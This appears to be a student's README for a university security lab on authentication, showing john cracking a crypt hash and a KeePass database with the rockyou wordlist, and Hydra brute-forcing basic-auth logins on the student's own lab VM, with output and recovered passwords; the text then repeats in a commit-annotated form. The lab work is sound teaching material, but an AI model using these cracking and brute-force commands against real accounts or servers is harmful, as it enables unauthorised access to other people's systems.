ASBTutorials/Lab 9 - Authentication/README.md

# Authentication
## Download Wordlist
```sh
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O rockyou.txt
```

## Password Cracking
Crack Password using `john`:

```sh
#!/bin/bash
john --wordlist=./rockyou.txt --format=crypt <(echo '$1$randsalt$1FzqFfQs5tCdStIZl215/.')
```

As a result we get the password: `topgunner2k7`

## KeePass Cracking
Download KeePass database:

<https://courses.fit.cvut.cz/BIE-ASB/tutorials/files/steve_passwords.kdbx>

Crack KeePass database password:

```sh
#!/bin/bash
john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx)
```

As a result, we get the password: `dancingdiva11195`

## Online Password Cracking
This task is solved using the `heartbleed` VM from Lab 5.

### Preparation
Look up IP address of `heartbleed` VM:

```sh
ip address show
```

Add local DNS entry for `heartbleed` VM:

```sh
echo '{ip address} heartbleed.ssb' | sudo tee --append /etc/hosts
```

Change Apache configuration to require login:

```diff
 <VirtualHost *:443>
     ServerAdmin webmaster@localhost
 
     DocumentRoot /var/www/heartbleed.ssb
     ServerName heartbleed.ssb
     ServerAlias www.heartbleed.ssb
     SSLEngine on
     SSLCertificateFile /etc/apache2/ssl/apache.crt
     SSLCertificateKeyFile /etc/apache2/ssl/apache.key
     ErrorLog ${APACHE_LOG_DIR}/error.log
     CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+    <Directory "/var/www/heartbleed.ssb">
+        AuthType Basic
+        AuthName "Restricted Content"
+        AuthUserFile /etc/apache2/.htpasswd
+        Require valid-user
+    </Directory>
 </VirtualHost>
```

Create user login `test` with a password of your choice (the later the password occurs in `rockyou.txt`, the longer it takes to crack):

```sh
sudo htpasswd -c /etc/apache2/.htpasswd test
```

Reload settings:

```sh
service apache2 reload
```

### Start Cracking
Crack password using `Hydra`:

```sh
hydra -l test -P ./rockyou.txt heartbleed.ssb https-get
```

Output:
```
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-gets://heartbleed.ssb:443/
[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active
[443][http-get] host: heartbleed.ssb   login: test   password: vendetta
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41
```
Add notes for Lab 09 2023-12-15 14:31:21 +00:00			`# Authentication`
			`## Download Wordlist`
			```sh
			`wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt -O rockyou.txt`
			```

			`## Password Cracking`
			Crack Password using `john`:

			```sh
			`#!/bin/bash`
			`john --wordlist=./rockyou.txt --format=crypt <(echo '$1$randsalt$1FzqFfQs5tCdStIZl215/.')`
			```

			As a result we get the password: `topgunner2k7`

			`## KeePass Cracking`
			`Download KeePass database:`

			`<https://courses.fit.cvut.cz/BIE-ASB/tutorials/files/steve_passwords.kdbx>`

			`Crack KeePass database password:`

			```sh
			`#!/bin/bash`
			`john --wordlist=./rockyou.txt <(keepass2john steve_passwords.kdbx)`
			```

			As a result, we get the password: `dancingdiva11195`
Solve `Authentication` task 2023-12-15 16:21:19 +00:00
			`## Online Password Cracking`
			This task is solved using the `heartbleed` VM from Lab 5.

			`### Preparation`
			Look up IP address of `heartbleed` VM:

			```sh
			`ip address show`
			```

			Add local DNS entry for `heartbleed` VM:

			```sh
			`echo '{ip address} heartbleed.ssb' \| sudo tee --append /etc/hosts`
			```

			`Change Apache configuration to require login:`

			```diff
			`<VirtualHost *:443>`
			`ServerAdmin webmaster@localhost`

			`DocumentRoot /var/www/heartbleed.ssb`
			`ServerName heartbleed.ssb`
			`ServerAlias www.heartbleed.ssb`
			`SSLEngine on`
			`SSLCertificateFile /etc/apache2/ssl/apache.crt`
			`SSLCertificateKeyFile /etc/apache2/ssl/apache.key`
			`ErrorLog ${APACHE_LOG_DIR}/error.log`
			`CustomLog ${APACHE_LOG_DIR}/access.log combined`
			`+`
			`+ <Directory "/var/www/heartbleed.ssb">`
			`+ AuthType Basic`
			`+ AuthName "Restricted Content"`
			`+ AuthUserFile /etc/apache2/.htpasswd`
			`+ Require valid-user`
			`+ </Directory>`
			`</VirtualHost>`
			```

			Create user login `test` with a password of your choice (the later the password occurs in `rockyou.txt`, the longer it takes to crack):

			```sh
			`sudo htpasswd -c /etc/apache2/.htpasswd test`
			```

			`Reload settings:`

			```sh
			`service apache2 reload`
			```

			`### Start Cracking`
			Crack password using `Hydra`:

			```sh
			`hydra -l test -P ./rockyou.txt heartbleed.ssb https-get`
			```

			`Output:`
			```
			`Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).`

			`Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-15 17:15:46`
			`[WARNING] You must supply the web page as an additional option or via -m, default path set to /`
			`[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task`
			`[DATA] attacking http-gets://heartbleed.ssb:443/`
			`[STATUS] 4625.00 tries/min, 4625 tries in 00:01h, 14339773 to do in 51:41h, 16 active`
			`[443][http-get] host: heartbleed.ssb login: test password: vendetta`
			`1 of 1 target successfully completed, 1 valid password found`
			`Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-15 17:18:41`
			```